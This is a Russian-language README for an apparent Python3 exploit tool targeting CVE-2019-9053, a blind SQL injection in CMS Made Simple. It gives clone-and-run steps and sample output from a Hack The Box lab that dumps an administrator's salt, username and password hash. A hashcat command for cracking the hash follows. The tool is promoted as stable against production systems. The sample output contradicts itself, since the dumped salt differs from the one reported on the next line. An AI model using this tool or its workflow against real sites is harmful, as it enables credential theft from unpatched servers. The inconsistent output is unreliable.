
Эксплойт Python3 для CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Без зависимостей, time-based blind SQLi → дамп админских кредов. HTB Writeup owned.
Чистый порт на Python3 оригинального эксплойта Exploit-DB #46635 от Daniele Scanu. Time-based blind SQLi для извлечения учётных данных администратора из уязвимых установок CMS Made Simple.
✅ Нет внешних зависимостей (только requests)
✅ Нативный Python 3.6+ (f-strings, walrus operator)
✅ Красивый цветной вывод (ANSI)
✅ Стабильный и быстрый (~3-5 мин дамп при средних соединениях)
✅ Обработка таймаутов/ошибок для целевых систем в production
✅ Вывод, готовый для Hashcat (соль + формат MD5)
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt
TIME = 3 # Sleep time (slower = more stable)
timeout = 20 # Request timeout
chars = '...' # Custom charset
Оригинальный автор: Daniele Scanu
Exploit-DB: #46635
Порт на Python3 и улучшения: Tim Karov
Лицензия MIT - См. LICENSE
⭐ Поставьте звезду, если полезно! Используется в лабораториях HTB/TryHackMe и реальных пентестах.